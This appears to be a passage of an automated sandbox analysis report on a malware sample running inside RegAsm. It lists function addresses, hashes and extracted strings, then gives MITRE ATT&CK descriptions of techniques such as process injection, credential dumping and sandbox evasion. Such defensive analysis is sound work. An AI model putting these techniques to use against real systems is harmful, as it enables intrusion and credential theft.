API String ID: 3861434553-3249790742
Opcode ID: c1f68f55d8e8b98da7a8dc8f71a31de373854987414512868f1acd656190aac3
Instruction ID: ee78c7d0252da59181078afd55f973ef8b1dab3207e3fec2bebd3f090d2a1d50
Opcode Fuzzy Hash: c1f68f55d8e8b98da7a8dc8f71a31de373854987414512868f1acd656190aac3
Instruction Fuzzy Hash: 44C01238A180008B86088F20AC80139B27AAB8F20AB50A42AC01B6B222C274D442860C

Function 004366F7 Relevance: 3.0, Strings: 2, Instructions: 455COMMON

Download Yara Rule

Strings

#, xrefs: 00436A68
n'B!, xrefs: 00436AD5

Memory Dump Source

Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: #$n'B!
API String ID: 0-2406872370
Opcode ID: 7520753a4ec4cd0a9bc0959d14932fcb5a92b39f3286b2a0234cb41b6301714d
Instruction ID: 5532e4a095cd03926b6754af58d78df9e487e896dc0285bec9cc4d8b2487c21a
Opcode Fuzzy Hash: 7520753a4ec4cd0a9bc0959d14932fcb5a92b39f3286b2a0234cb41b6301714d
Instruction Fuzzy Hash: 87D1E33B619212CBCB18AF28DC6226E73E2FF8A745F0BC47DD4458B2A0DB39C9508715

Function 004014B3 Relevance: 2.8, Strings: 2, Instructions: 263COMMON

Download Yara Rule

Strings

0123456789abcdefxp, xrefs: 004014BD
0123456789ABCDEFXP, xrefs: 004014B3

Memory Dump Source

Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: 0123456789ABCDEFXP$0123456789abcdefxp
API String ID: 0-595753566
Opcode ID: 42d60f80324c95ef2fd19c79e7edbe83cd68dcc0952184340a40a4c4267bc099
Instruction ID: 7f83093fdfa886b29f6d75bb5a23efdcf0648f8279e69ff4650518dc13d16477
Opcode Fuzzy Hash: 42d60f80324c95ef2fd19c79e7edbe83cd68dcc0952184340a40a4c4267bc099
Instruction Fuzzy Hash: 7C91D031A083418FD714CE29858426FBBE2AFD5314F18893EE999A73D1D7B9D8058B86

Function 004222ED Relevance: 2.7, Strings: 2, Instructions: 167COMMON

Download Yara Rule

Strings

8;, xrefs: 0042248C
(%B, xrefs: 00422522

Memory Dump Source

Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: (%B$8;
API String ID: 0-4224822745
Opcode ID: 09320fb1d3c6f781c7cacccaeb59ea437963b0392f48d3700f9295a67b0dac14
Instruction ID: 15796580c29967bb32aad8ccaafd6f2d70c8bb1af74f69c98818116406b814ad
Opcode Fuzzy Hash: 09320fb1d3c6f781c7cacccaeb59ea437963b0392f48d3700f9295a67b0dac14
Instruction Fuzzy Hash: B7510FB4D01358ABDB24DFA8DD467DDBF71AB45314F148269E8A8AF2C4C7740849CF82

Function 00420750 Relevance: 1.7, APIs: 1, Instructions: 245comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(004429E8,00000000,00000001,004429D8), ref: 00420779

Memory Dump Source

Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Similarity

API ID: CreateInstance
String ID:
API String ID: 542301482-0
Opcode ID: be24353db708b4d4229f611224b2503b48cdc3e675f6940a93d0eb48f37539d0
Instruction ID: 1c2bdeb94b5ba208a473908e2a6b5b722f931ee80727048f906afae43ab012e8
Opcode Fuzzy Hash: be24353db708b4d4229f611224b2503b48cdc3e675f6940a93d0eb48f37539d0
Instruction Fuzzy Hash: 2D51BFB17002149BEB20AB24DC86B6773E4FF81768F444519F945CB392F778E944C76A

Function 00423E07 Relevance: 1.5, Strings: 1, Instructions: 206COMMON

Download Yara Rule

Strings

uGB, xrefs: 0042476F

Memory Dump Source

Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: uGB
API String ID: 0-2324794071
Opcode ID: 68350e04edb8994292c73e659ee0932605d97a3757c80ad15aa4df2cdd48ab27
Instruction ID: 2a71fa99091e37d9177ca987b451bb93aff07835325b93aa89a7059f1b3a62ac
Opcode Fuzzy Hash: 68350e04edb8994292c73e659ee0932605d97a3757c80ad15aa4df2cdd48ab27
Instruction Fuzzy Hash: E2519836B483618FD320CB28E880267B7D2DFE6351F89826AD6D40B395D73DC809D796

Function 004293B3 Relevance: 1.4, Strings: 1, Instructions: 163COMMON

Download Yara Rule

Strings

FBMx, xrefs: 00429420

Memory Dump Source

Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: FBMx
API String ID: 0-4146874645
Opcode ID: 627c668ffd5578d6f69c1d59d95a7d1d0a0dd731a6eecbf54792d5d288648191
Instruction ID: 7c2b547654936a7a8f8319ef14b82db5565c025c677c9e25f718dfa35f60652f
Opcode Fuzzy Hash: 627c668ffd5578d6f69c1d59d95a7d1d0a0dd731a6eecbf54792d5d288648191
Instruction Fuzzy Hash: 7D41EA706087908FD3268F3594A07B3BBE1AF67305F18549EE0EB47342D3796806C769

Function 00411DB0 Relevance: 1.4, Strings: 1, Instructions: 145COMMON

Download Yara Rule

Strings

-4, xrefs: 00411FAE

Memory Dump Source

Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: -4
API String ID: 0-3249790742
Opcode ID: 596707033267d9f0075936f7d922f85c011da0fad181471914a88865c22f02eb
Instruction ID: 8aca84e40545209fdb2d8b35976cefb1c594da7aa5ff0c97ffd916c953638cdc
Opcode Fuzzy Hash: 596707033267d9f0075936f7d922f85c011da0fad181471914a88865c22f02eb
Instruction Fuzzy Hash: C6415B3662931057C32C8F68C89256BB792EF95308F19923FDD4A172A1DB799C418BCD

Function 004230A6 Relevance: 1.4, Strings: 1, Instructions: 119COMMON

Download Yara Rule

Strings

e'B, xrefs: 004237A0, 0042383E

Memory Dump Source

Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: e'B
API String ID: 0-4081730048
Opcode ID: f8bcc63f0ceab1b701462bee6b30f7fdc221c3d6f40941c20e6d34de46b65af5
Instruction ID: e7ee576ed9efd2e9c3c389938149e6a68afe3f75d82ce871b0330f4537dd6204
Opcode Fuzzy Hash: f8bcc63f0ceab1b701462bee6b30f7fdc221c3d6f40941c20e6d34de46b65af5
Instruction Fuzzy Hash: 2631C3B9B182118FCB18CF28DC8596B37B3EF86342B59D47AD011DB261EB3C8901CB48

Function 00436350 Relevance: 1.4, Strings: 1, Instructions: 117COMMON

Download Yara Rule

Strings

}z{x, xrefs: 00436405

Memory Dump Source

Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: }z{x
API String ID: 0-1935807464
Opcode ID: 11b82ecff260dc885fc27bdf2763858f5819e35cf34130d77cc39d8bd48c8a86
Instruction ID: c2fe4bd197b3f8940e13c4d42f8ccc48d4f2f790a7f62d3db4fbfa854d76f439
Opcode Fuzzy Hash: 11b82ecff260dc885fc27bdf2763858f5819e35cf34130d77cc39d8bd48c8a86
Instruction Fuzzy Hash: 2C318D70A043017BE6109B15CC81B3B77A9DF9970CF01A53EFD9597252E239DC05C26E

Function 0040FF28 Relevance: 1.3, Strings: 1, Instructions: 95COMMON

Download Yara Rule

Strings

LO, xrefs: 0040FF9B

Memory Dump Source

Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: LO
API String ID: 0-4218834679
Opcode ID: 75a8acb2736b9bbca07126e771eacac5bc987dee8e051a9f25db1d155e375cd3
Instruction ID: 316a0c713d8ec889d0f2383d5a3762abcadb3709da7811cf17198a4df97889c8
Opcode Fuzzy Hash: 75a8acb2736b9bbca07126e771eacac5bc987dee8e051a9f25db1d155e375cd3
Instruction Fuzzy Hash: B3210572A483505FC324CF28CCC131BBAE1ABD6218F159A3DF5E5D77D5D67988008786

Function 00426FD0 Relevance: 1.3, Strings: 1, Instructions: 61COMMON

Download Yara Rule

Strings

}z{x, xrefs: 00427021

Memory Dump Source

Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: }z{x
API String ID: 0-1935807464
Opcode ID: c5e1ba8d5768a3735c12b02acaad27576671a453925e0dc8b78d7f7701e76775
Instruction ID: 7a1b2fdff1fca2a0268dad40c3110e9638c419b9d121008f2e3427452ec6be7a
Opcode Fuzzy Hash: c5e1ba8d5768a3735c12b02acaad27576671a453925e0dc8b78d7f7701e76775
Instruction Fuzzy Hash: 320100346093088FC3149B24E890B3BBBB2EB63344F50586DE0A08B262C339CC168B4A

Function 00421379 Relevance: .5, Instructions: 472COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa2356303a2ae905909117f82a7795db23c925d4aeb5962e10336c2a7c82ca01
Instruction ID: 64d6ff258e70e9ab58b699059f502ec1843e9dc0696fdec6636c7144f00a226f
Opcode Fuzzy Hash: fa2356303a2ae905909117f82a7795db23c925d4aeb5962e10336c2a7c82ca01
Instruction Fuzzy Hash: 03F10436A18211DFD708DF28DC9172AB3E2FF8A311F0A857DD945972A1D778E811CB86

Function 0040A5F0 Relevance: .5, Instructions: 459COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1abf26608bdd3bd75c3c7c675eb962f4bd3aa85f1225da50f038d88f940cb63
Instruction ID: 618b86bf15bcba3e6bb4b432628653469f60eedb0241b407a2bfa20550f3c4a2
Opcode Fuzzy Hash: a1abf26608bdd3bd75c3c7c675eb962f4bd3aa85f1225da50f038d88f940cb63
Instruction Fuzzy Hash: DDF1CF752083418FD724CF29C88176BBBE2AFD9304F08892EE5C587391E639E849CB56

Function 004266F0 Relevance: .4, Instructions: 358COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6efb06bef768654ac0040adc0ce0407ad6a81646d1f38bc101bc1890ff5b14a9
Instruction ID: 0ccc64e59b4d2728c8f97c992ab3215f7c9b2ea39977d498fa6241edf0da81b1
Opcode Fuzzy Hash: 6efb06bef768654ac0040adc0ce0407ad6a81646d1f38bc101bc1890ff5b14a9
Instruction Fuzzy Hash: 5FC1FE752083518FD324CF24D8407ABBBF1FFC6704F01892DE999AB281D7B89909CB96

Function 00439940 Relevance: .3, Instructions: 298COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb22de691025e9604b791d4e65fae7c01e9dad6cb231151d9386f35b159a5ece
Instruction ID: e6547d7ce266cca01e0daee87e6cca674daf0050e72b53d60891a40b1d21bcce
Opcode Fuzzy Hash: eb22de691025e9604b791d4e65fae7c01e9dad6cb231151d9386f35b159a5ece
Instruction Fuzzy Hash: 05B11771A083518FC719CF28C49062EBBE1AFC9314F198A6EE8D58B391C775EC05CB96

Function 0043FCC0 Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6b2cd09176f61552b1d6f2e1c9410f103319e7aaf139fadf8e6762b11bcf9ce4
Instruction ID: d5e2c306aed0e9f0a4523fdea87c2092727505e879cf5e08cc8bb1e74fe301f1
Opcode Fuzzy Hash: 6b2cd09176f61552b1d6f2e1c9410f103319e7aaf139fadf8e6762b11bcf9ce4
Instruction Fuzzy Hash: 5E91D235A143018BD714DF18C850A2BB7E2FF99750F19A47EE9858B361EB34EC15CB8A

Function 00405DE0 Relevance: .2, Instructions: 163COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6925b7b30ae1d64aa03c94434c67ba7450ac3eddcb7f7670797234d86eb0a273
Instruction ID: 0d33a859858de1e777918ecbbea9d87bf78b6d517e5369397cfe6a83e4d9b11e
Opcode Fuzzy Hash: 6925b7b30ae1d64aa03c94434c67ba7450ac3eddcb7f7670797234d86eb0a273
Instruction Fuzzy Hash: 1051AE75A046019FC714DF18C480927B7A1FF89324F15467EF899AB392DA39EC42CF9A

Function 004269E0 Relevance: .1, Instructions: 142COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 984d738aec387f28cc7eaec4ca5c67fb99259926ca56a74be65a122adab2f618
Instruction ID: 93b374079003cf47803463db6aed036ab20df5fd0c0726eead366e94e35a9902
Opcode Fuzzy Hash: 984d738aec387f28cc7eaec4ca5c67fb99259926ca56a74be65a122adab2f618
Instruction Fuzzy Hash: 6D41DC74608311CBD3109F54E85236BB3F0FF96714F04892DE9859B3A1E7B8D944CB4A

Function 00438580 Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae03d0efe5d3416f09bdfbd8c7dc735336d366e1cf58bc6a7fb73e4b6a30e704
Instruction ID: 800bc67bdf34f8eb84e2d2acdca91b3e4e4a41be4a419d3d02d7bdb166052edc
Opcode Fuzzy Hash: ae03d0efe5d3416f09bdfbd8c7dc735336d366e1cf58bc6a7fb73e4b6a30e704
Instruction Fuzzy Hash: AC3126765093108BD311CF19C88576BFBE0EBC9719F18A97DF4849B351CB7889068BDA

Function 00404D50 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8eb8d57d4933a829067fb9749367417295eda5b282249417eec4ffb832f8d17
Instruction ID: 4c073cf3540596e04badca7617fc7e9bc7deaedfcf28b63a0a35df37db274471
Opcode Fuzzy Hash: f8eb8d57d4933a829067fb9749367417295eda5b282249417eec4ffb832f8d17
Instruction Fuzzy Hash: 5731A7B1604200DBD7559F19C88096BB7E1EFC4318F18893EE999A73C1D339DC52CB8A

Function 00419D70 Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 566f3fa44258c39495b3ff392f0dd1104c074346eb22a3ef3670f1add33d93fc
Instruction ID: bb6f8750bbd66f049743e392adceb248b911c9de5a183c3136beb1899a1fcac4
Opcode Fuzzy Hash: 566f3fa44258c39495b3ff392f0dd1104c074346eb22a3ef3670f1add33d93fc
Instruction Fuzzy Hash: 6821B6B1904211C7DB209F24D8213A7B3F2FFE5364F29861DE8995B390E7799881C785

Function 00438700 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 69804dbb9d62350fdcf614b4d4a0a44e0fa0173df43693d40f72767662333e9d
Instruction ID: 668cd533223910cd228620b75c64fe88c6fb7912326b3a219a5fe6b3fc7877d8
Opcode Fuzzy Hash: 69804dbb9d62350fdcf614b4d4a0a44e0fa0173df43693d40f72767662333e9d
Instruction Fuzzy Hash: BA11E13AA153144BD7205A289D8073BB667EBDA752F39A47EE8842B345CB388C0183E5

Function 00432A10 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction ID: 0227e66d0875c2311f38e4fe89d52de8498e6a121306d11f672e0d7d7f24ec6b
Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction Fuzzy Hash: 3A115933A041E50FC3269D3C8500566BFE31B97634F28539AF0F98B2D2C2268D8B9318

Function 00428140 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ab600a1f1ac4be9712db55490683db8e3c353756ab72a2fb5bfbe5eeaa2fdbd
Instruction ID: 6336afc45053181afdc7446a70e9b56c12bbfa34acc44c348cd50f34c0f480c3
Opcode Fuzzy Hash: 7ab600a1f1ac4be9712db55490683db8e3c353756ab72a2fb5bfbe5eeaa2fdbd
Instruction Fuzzy Hash: A40192B170231147E6209F52E8C573BB2A89F84708F08453EE8089B381EF79EC26C299

Function 004194AD Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c34800b2d6e2c669b3003c1a405595c7692c1fe1220db37c76c0ab0c7303bfe8
Instruction ID: 5bd34d858dd06a56d78af1502e90c44f0a6944959865b12bf66644d78649c3bb
Opcode Fuzzy Hash: c34800b2d6e2c669b3003c1a405595c7692c1fe1220db37c76c0ab0c7303bfe8
Instruction Fuzzy Hash: FF2122714083818FD735CF14D8506DFBBE2EB86304F00882DD89C9B262DB329A16CBC6

Function 00407210 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a03e5394408b1fdc976f891483c031e2c6c7e2b4ccc8eb1f281f531e604d31db
Instruction ID: b9eed158d1a4c5a8f95884017e16127f008288ee18346c9cf546a7ae42f2f0ed
Opcode Fuzzy Hash: a03e5394408b1fdc976f891483c031e2c6c7e2b4ccc8eb1f281f531e604d31db
Instruction Fuzzy Hash: 54F0F62AB5C31A0BE620DEF99CC0827F3D6D7CA254B19423DF941D3391D479F80282A6

Function 0043B65F Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 669bc889fa446b6e7cf18cce93b22bde3a746c92e4791af13414d688a4bd588a
Instruction ID: 3eef60f30b737d7551fafe8816eea61c88680f234307081c63391da5742a7ff7
Opcode Fuzzy Hash: 669bc889fa446b6e7cf18cce93b22bde3a746c92e4791af13414d688a4bd588a
Instruction Fuzzy Hash: 590171F4C10204BFCB50FFB9E9474AEBE34EB06251F50422AF8407724AD231451A8BEB

Function 0041F963 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc6a665356546ab3159159aec1b5944d5590de67b019fc03f11f8fcb1e714f0f
Instruction ID: 143535b4edc0e874a23990f2e6068331c86e6e446665e0b03c92cf62ce2225ea
Opcode Fuzzy Hash: dc6a665356546ab3159159aec1b5944d5590de67b019fc03f11f8fcb1e714f0f
Instruction Fuzzy Hash: 79B092A9C0A810C7E4113F11BD4E4AAB034891B209F042136E80A7A243B63AD61A40AF

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of services running on remote hosts and local network infrastructure devices, including those that may be vulnerable to remote software exploitation. Common methods to acquire this information include port and/or vulnerability scans using tools that are brought onto a system.
Tactics:	Discovery
Data Sources:	Cloud Service: Cloud Service Enumeration, Command: Command Execution, Network Traffic: Network Traffic Flow
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

